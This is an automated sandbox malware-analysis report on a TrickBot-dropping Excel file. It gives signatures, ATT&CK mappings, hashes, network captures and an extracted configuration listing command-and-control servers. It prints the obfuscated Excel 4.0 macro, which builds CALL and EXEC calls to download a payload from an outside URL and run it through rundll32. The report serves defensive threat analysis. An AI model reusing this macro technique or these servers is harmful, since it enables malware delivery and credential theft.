Analysis Report 446446.xls
Overview
General Information
Detection
Hidden Macro 4.0 TrickBot
Score: | 96 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Document exploit detected (drops PE files)
Found malware configuration
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Yara detected Trickbot
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Drops PE files to the user root directory
Found Excel 4.0 Macro with suspicious formulas
Found obfuscated Excel 4.0 Macro
Office process drops PE file
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Document contains embedded VBA macros
Drops PE files
Drops PE files to the user directory
Drops files with a non-matching file extension (content does not match file extension)
Found dropped PE file which has not been started or loaded
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match
Classification
Startup |
---|
|
Malware Configuration |
---|
Threatname: Trickbot |
---|
{"ver": "2000028", "gtag": "rob52", "servs": ["89.250.208.42:449", "182.253.184.130:449", "31.211.85.110:443", "85.112.74.178:449", "102.68.17.97:443", "103.76.150.14:443", "96.9.77.142:443", "91.185.236.170:449", "87.76.1.81:449", "91.225.231.120:443", "62.213.14.166:443", "201.114.152.181:60304", "91.248.207.239:13871", "5.50.104.227:23468", "122.117.176.99:50289", "250.16.62.7:12037", "43.219.127.177:42389", "183.210.9.161:55813", "203.2.134.219:34188", "24.203.49.183:64402", "89.227.14.153:60566", "44.55.149.111:41730", "197.181.162.30:5798", "152.49.214.109:59125", "245.241.127.55:36657", "107.85.198.194:37398", "191.250.160.220:23460", "40.81.224.235:45065", "211.246.214.27:8638"], "autorun": ["pwgrab"], "ecc_key": "RUNTMzAAAAAL/ZqmMPBLaRfg1hPOtFJrZz2Zi2/EC4B3fiX8VnaOUVKndBr+jEqWc7mw4v3ADTiwp64K5QKe1LZ27jUZxL4bWjxARPo85hv72nuedeZhRQ+adQQ/gIsV869MycRzghc="}
Yara Overview |
---|
Initial Sample |
---|
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
SUSP_EnableContent_String_Gen | Detects suspicious string that asks to enable active content in Office Doc | Florian Roth |
|
Memory Dumps |
---|
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_TrickBot_4 | Yara detected Trickbot | Joe Security | ||
JoeSecurity_TrickBot_4 | Yara detected Trickbot | Joe Security | ||
JoeSecurity_TrickBot_4 | Yara detected Trickbot | Joe Security |
Unpacked PEs |
---|
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_TrickBot_4 | Yara detected Trickbot | Joe Security | ||
JoeSecurity_TrickBot_4 | Yara detected Trickbot | Joe Security | ||
JoeSecurity_TrickBot_4 | Yara detected Trickbot | Joe Security |
Sigma Overview |
---|
No Sigma rule has matched |
---|
Signature Overview |
---|
AV Detection: |
---|
Found malware configuration | Show sources |
Source: | Malware Configuration Extractor: |
Source: | File opened: |
Software Vulnerabilities: |
---|
Document exploit detected (drops PE files) | Show sources |
Source: | File created: | Jump to dropped file |
Document exploit detected (UrlDownloadToFile) | Show sources |
Source: | Section loaded: |
Document exploit detected (process start blacklist hit) | Show sources |
Source: | Process created: |
System Summary: |
---|
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros) | Show sources |
Source: | Screenshot OCR: | ||
Found Excel 4.0 Macro with suspicious formulas | Show sources |
Source: | Initial sample: | ||
Source: | Initial sample: |
Found obfuscated Excel 4.0 Macro | Show sources |
Source: | Initial sample: | ||
Source: | Initial sample: |
Office process drops PE file | Show sources |
Source: | File created: | Jump to dropped file | ||
Source: | File created: | Jump to dropped file |
Boot Survival: |
---|
Drops PE files to the user root directory | Show sources |
Source: | File created: | Jump to dropped file |
Stealing of Sensitive Information: |
---|
Yara detected Trickbot | Show sources |
Source: | File source: | ||
Remote Access Functionality: |
---|
Yara detected Trickbot | Show sources |
Source: | File source: | ||
Mitre Att&ck Matrix |
---|
Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Valid Accounts | Scripting21 | Path Interception | Process Injection11 | Masquerading121 | OS Credential Dumping | File and Directory Discovery1 | Remote Services | Data from Local System | Exfiltration Over Other Network Medium | Non-Application Layer Protocol2 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition |
Default Accounts | Exploitation for Client Execution33 | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Disable or Modify Tools1 | LSASS Memory | System Information Discovery2 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Application Layer Protocol12 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Rundll321 | Security Account Manager | Query Registry | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Ingress Tool Transfer2 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Process Injection11 | NTDS | System Network Configuration Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | Protocol Impersonation | SIM Card Swap | Carrier Billing Fraud | |
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Scripting21 | LSA Secrets | Remote System Discovery | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings | |
Replication Through Removable Media | Launchd | Rc.common | Rc.common | Obfuscated Files or Information1 | Cached Domain Credentials | System Owner/User Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features |
Antivirus, Machine Learning and Genetic Malware Detection |
---|
Initial Sample |
---|
No Antivirus matches |
---|
Dropped Files |
---|
No Antivirus matches |
---|
Unpacked PE Files |
---|
Source | Detection | Scanner | Label | Link | Download |
---|---|---|---|---|---|
100% | Avira | HEUR/AGEN.1138157 | Download File |
Domains |
---|
No Antivirus matches |
---|
URLs |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | Avira URL Cloud | safe |
Domains and IPs |
---|
Contacted Domains |
---|
Name | IP | Active | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|---|
living-traditions.com | 64.207.186.30 | true | false | unknown |
Contacted URLs |
---|
Name | Malicious | Antivirus Detection | Reputation |
---|---|---|---|
false |
| unknown |
URLs from Memory and Binaries |
---|
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false | high | |||
false | high |
Contacted IPs |
---|
Public |
---|
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
64.207.186.30 | living-traditions.com | United States | 398110 | GO-DADDY-COM-LLCUS | false |
General Information |
---|
Joe Sandbox Version: | 31.0.0 Emerald |
Analysis ID: | 385552 |
Start date: | 12.04.2021 |
Start time: | 17:05:10 |
Joe Sandbox Product: | CloudBasic |
Overall analysis duration: | 0h 5m 20s |
Hypervisor based Inspection enabled: | false |
Report type: | light |
Sample file name: | 446446.xls |
Cookbook file name: | defaultwindowsofficecookbook.jbs |
Analysis system description: | Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2) |
Number of analysed new started processes analysed: | 7 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Detection: | MAL |
Classification: | mal96.troj.expl.evad.winXLS@7/7@1/1 |
EGA Information: |
|
HDC Information: |
|
HCA Information: |
|
Cookbook Comments: |
|
Warnings: | Show All
|
Simulations |
---|
Behavior and APIs |
---|
Time | Type | Description |
---|---|---|
17:05:41 | API Interceptor |
Joe Sandbox View / Context |
---|
IPs |
---|
No context |
---|
Domains |
---|
No context |
---|
ASN |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
GO-DADDY-COM-LLCUS | Get hash | malicious | Browse |
JA3 Fingerprints |
---|
No context |
---|
Dropped Files |
---|
No context |
---|
Created / dropped Files |
---|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | downloaded |
Size (bytes): | 449536 |
Entropy (8bit): | 5.5101637778448955 |
Encrypted: | false |
SSDEEP: | 6144:BqeyCMxv21VX5rHrP9HlIjlYVnvi5TnMTBs7xTUgzFxmSZ81gVRHZOXTulpwNF6c:Bq9CAvi3LlHXtiyTBITzwTCAa6dx |
MD5: | CBEA511BD35F247E4B4BF7CC5A3A7CBD |
SHA1: | 8C0D352934271350CFE6C00B7587E8DC8D062817 |
SHA-256: | 0AE86E5ABBC09E96F8C1155556CA6598C22AEBD73ACBBA8D59F2CE702D3115F8 |
SHA-512: | AEC894D9D3AACCCCC029C615D283AF4946C5150372DB0ECDD616A9D491478759068214BF03DB11631A5EFB59951150D92C1517C2C11D8C6F0DDF5C8F76734FCF |
Malicious: | true |
Reputation: | low |
IE Cache URL: | http://living-traditions.com/blogs/click.php |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 80628 |
Entropy (8bit): | 7.888145041366286 |
Encrypted: | false |
SSDEEP: | 1536:ZnC+ow5JeueA6rWGH3WdPMAeWRlMVGoIahaDHTU6hryF70Ki9h:ZnC+oQirW23WhMg2sTU2yF70KiD |
MD5: | B0C770DA6FFF46D0500CCF97D7CDA12A |
SHA1: | 664AE1F31F2012830589FD05CB8798918F6F0219 |
SHA-256: | 3BF029B9AB1A47C8BB4C5EB0DF93AC234CFF71835AA2D9E58C342F3A1BBD29BA |
SHA-512: | C1A27AAFEB6D561E23AEC2CDFE4EDD527AC92214853020F37F2F41402E1389619173FDE9B67ECD04561CF9EC7BB28E01A9A0A6302855779103CC213138CC8591 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 1984 |
Entropy (8bit): | 4.464349531148646 |
Encrypted: | false |
SSDEEP: | 24:8Dnbk/XTd6jFyPDVeMsODv3qcTdM7dD2Dnbk/XTd6jFyPDVeMsODv3qcTdM7dV:8s/XT0jFwDVmlWQh2s/XT0jFwDVmlWQ/ |
MD5: | 4348595ED5C238F3A7464C51D0660C8B |
SHA1: | E63FE61EDDE7BE6C9F33EBF482C9452B52F2657F |
SHA-256: | 727289508032F34D8792E6DFD9DE538C64EEE1A0932ADB30431893A482159B92 |
SHA-512: | 67193929EBE343C53FDB503307E034CA17218201E337B5BECF8449D140FC81E065567F7641F4BFC51B35EACBBB852072B8C1A74E872EE9C997AF7C2B8A9607CB |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 867 |
Entropy (8bit): | 4.473944875294604 |
Encrypted: | false |
SSDEEP: | 12:85QD7LgXg/XAlCPCHaXtB8XzB/xqvX+WnicvbIsnbDtZ3YilMMEpxRljK3wXyTdK:85w/XTd6j6vYeMsbDv3qcTrNru/ |
MD5: | 0A126F4CE8A412A7E0B56FDD34D13F90 |
SHA1: | 205C7790F9A579AD5D87877D7D4A488A388B8AA8 |
SHA-256: | 9C63D6D21963E3AD8536BC4761DC624A4D7A490F608BFE2BDE5CC491B36C3606 |
SHA-512: | B1A35E61AB7B52CFD5089807AE8B7EA604E52AFD6FE173EC324EACC8DDEC428A76ACF5024E8E41A030CAC311DBE52557D81A237DDEF72C953EE0F9C61A750386 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 71 |
Entropy (8bit): | 4.032792717761047 |
Encrypted: | false |
SSDEEP: | 3:oyBVomMJRT30YVo730YVomMJRT30YVov:dj6J1E4B46J1E4y |
MD5: | E9BA10F8D1524D050B02A3E80256C566 |
SHA1: | 950B596DB0C42E0A9B02ACEEB0166DACB72B96AE |
SHA-256: | 8B69C0A0164EEC53F4F1BEAD5E95EBE38B27A23903D4D08570DBA040E6E93C0B |
SHA-512: | 9E626D38996BF29D3616FDCDB6CDDA07B141054294512ADA00A2E18A250F682EB34D0C3CA75796170D096183329298C695F099EAF2DB6FDA1181364033C4B3F3 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 138843 |
Entropy (8bit): | 6.821911851482883 |
Encrypted: | false |
SSDEEP: | 3072:e88rmjAItyzElBIL6lECbgBGGP5xLm7TD2jTUqyF70Ci6W2fXGUVxvfXGURH88rd:R8rmjAItyzElBIL6lECbgBvP5Nm7TUUJ |
MD5: | B68BAB90F3799DF7526E7FDF201A9D29 |
SHA1: | 50AFB3C63A6BD986AF93D8B15B8F783585FFC295 |
SHA-256: | 276BA2D933458EE7908C4B881C60C131A2CBDD8914ED4938DE68D74D10F95F78 |
SHA-512: | D9CC208214B67AF0C5A0C84EB31B9975CB85F9392E63635CBA2946F7CC6B2F9D96434A05CF0C7A5D59ED92B8D8F18474FDDA68E8D120AA8F78DAD56635ACEF31 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 449536 |
Entropy (8bit): | 5.5101637778448955 |
Encrypted: | false |
SSDEEP: | 6144:BqeyCMxv21VX5rHrP9HlIjlYVnvi5TnMTBs7xTUgzFxmSZ81gVRHZOXTulpwNF6c:Bq9CAvi3LlHXtiyTBITzwTCAa6dx |
MD5: | CBEA511BD35F247E4B4BF7CC5A3A7CBD |
SHA1: | 8C0D352934271350CFE6C00B7587E8DC8D062817 |
SHA-256: | 0AE86E5ABBC09E96F8C1155556CA6598C22AEBD73ACBBA8D59F2CE702D3115F8 |
SHA-512: | AEC894D9D3AACCCCC029C615D283AF4946C5150372DB0ECDD616A9D491478759068214BF03DB11631A5EFB59951150D92C1517C2C11D8C6F0DDF5C8F76734FCF |
Malicious: | true |
Reputation: | low |
Preview: |
|
Static File Info |
---|
General | |
---|---|
File type: | |
Entropy (8bit): | 3.2150745788685295 |
TrID: |
|
File name: | 446446.xls |
File size: | 283136 |
MD5: | 1b62b4f4b16d6219dce4c6d145c5af79 |
SHA1: | d5bc46f3043119c020ae93121195aabbf151cf75 |
SHA256: | dd3ecdcc3a6cc81ee451f90703cc899ff43c7a05b30a6538e5f3afd73f77adb1 |
SHA512: | 1a774ebb111463491f16a88b465e959c14ba32b6a399f108abe43fef66e61b663840998efdcd504306f3b28dd052032b82e8e642ffc9f9ed05186aaedbaf420e |
SSDEEP: | 6144:DcPiTQAVW/89BQnmlcGvgZ7r3J8b5I2JK+2vYft:mwt |
File Content Preview: | ........................>.......................'..........................."...#...$...%...&.................................................................................................................................................................. |
File Icon |
---|
Icon Hash: | e4eea286a4b4bcb4 |
Static OLE Info |
---|
General | ||
---|---|---|
Document Type: | OLE | |
Number of OLE Files: | 1 |
OLE File "446446.xls" |
---|
Indicators | |
---|---|
Has Summary Info: | True |
Application Name: | Microsoft Excel |
Encrypted Document: | False |
Contains Word Document Stream: | False |
Contains Workbook/Book Stream: | True |
Contains PowerPoint Document Stream: | False |
Contains Visio Document Stream: | False |
Contains ObjectPool Stream: | |
Flash Objects Count: | |
Contains VBA Macros: | True |
Summary | |
---|---|
Code Page: | 1251 |
Last Saved By: | |
Create Time: | 2006-09-16 00:00:00 |
Last Saved Time: | 2021-04-12 14:51:16 |
Creating Application: | |
Security: | 0 |
Document Summary | |
---|---|
Document Code Page: | 1251 |
Thumbnail Scaling Desired: | False |
Contains Dirty Links: | False |
Streams |
---|
Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096 |
---|
General | |
---|---|
Stream Path: | \x5DocumentSummaryInformation |
File Type: | data |
Stream Size: | 4096 |
Entropy: | 0.335261663834 |
Base64 Encoded: | False |
Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . 0 . . . . . . . 8 . . . . . . . @ . . . . . . . H . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . D o c u S i g n . . . . . . D o c s 1 . . . . . D o c s 2 . . . . . D o c s 3 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . E x c e l 4 . 0 . . . . . . . . . . . . . . . . . . . |
Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096 |
---|
General | |
---|---|
Stream Path: | \x5SummaryInformation |
File Type: | data |
Stream Size: | 4096 |
Entropy: | 0.244430475899 |
Base64 Encoded: | False |
Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . 8 . . . . . . . @ . . . . . . . L . . . . . . . d . . . . . . . p . . . . . . . | . . . . . . . . . . . . . . . . . . . 5 . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . . | . # . . . @ . . . . J . J . / . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . |
Stream Path: Book, File Type: Applesoft BASIC program data, first line number 8, Stream Size: 270942 |
---|
General | |
---|---|
Stream Path: | Book |
File Type: | Applesoft BASIC program data, first line number 8 |
Stream Size: | 270942 |
Entropy: | 3.18416886572 |
Base64 Encoded: | True |
Data ASCII: | . . . . . . . . . 7 . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . 5 B . . . . . . . . . . . . . . . . . . . . . . . D o c s 2 . . ! . . . . . . . . . . . . . . . : . . . . . . . . . . . . . . . . 6 . . . . . . . . . . . . . . . . . . = . . . . . i . . 9 J . 8 . . . . . . . X . |
Macro 4.0 Code |
---|
"=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CALL(Docs3!BX29&Docs3!BQ24&Docs3!BQ33&Docs3!BQ34,Docs3!BZ29&Docs3!CC33&Docs3!BY31&Docs3!CC35&Docs3!CC36,Docs3!CF29&Docs3!CF30,0,Docs3!BX9,Docs3!CD19,0,0)"=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=C
HAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=Docs1!BC13()
,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=EXEC(Docs3!BS36&Docs3!BS37&Docs3!CF43&Docs3!CF44&Docs3!CD19&Docs3!BZ37&Docs3!BZ39&Docs3!BZ43&Docs3!BZ44)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=Docs3!BA22(),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,
,,,,,,,,,,,,,,,,,,,,,,,http://living-traditions.com/blogs/click.php,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,..\fdinmd.fii,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=HALT(),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,RL,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,U,,UR,,,,,,JJC,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,CBB,,,,,,,,,,,,,,,,,,,,,,,,nload,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,Mo,,,,,,,,,,,,LDow,,,,,,,,,,,,,,,,,,,n,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,ToFil,,,,,,,,,,,,,,,,,,,,,r,,,,,,,,,,eA,,,,,,,,,,,,,,,,,,,,,u,,,,,,,",St",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,a,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,rt,,,,,,ndl,,,,,,,,,,,,,,,,,,,,,,,,,W,,,,,,l32
Network Behavior |
---|
Network Port Distribution |
---|
TCP Packets |
---|
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Apr 12, 2021 17:06:02.567907095 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30 |
Apr 12, 2021 17:06:02.698780060 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22 |
UDP Packets |
---|
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Apr 12, 2021 17:06:02.484072924 CEST | 52197 | 53 | 192.168.2.22 | 8.8.8.8 |
Apr 12, 2021 17:06:02.546745062 CEST | 53 | 52197 | 8.8.8.8 | 192.168.2.22 |
DNS Queries |
---|
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class |
---|---|---|---|---|---|---|---|
Apr 12, 2021 17:06:02.484072924 CEST | 192.168.2.22 | 8.8.8.8 | 0xed69 | Standard query (0) | | A (IP address) | IN (0x0001) |
DNS Answers |
---|
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class |
---|---|---|---|---|---|---|---|---|---|
Apr 12, 2021 17:06:02.546745062 CEST | 8.8.8.8 | 192.168.2.22 | 0xed69 | No error (0) | | | 64.207.186.30 | A (IP address) | IN (0x0001) |
HTTP Packets |
---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
0 | 192.168.2.22 | 49165 | 64.207.186.30 | 80 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Apr 12, 2021 17:06:02.699388027 CEST | 0 | OUT | |
Apr 12, 2021 17:06:02.888154984 CEST | 2 | IN | |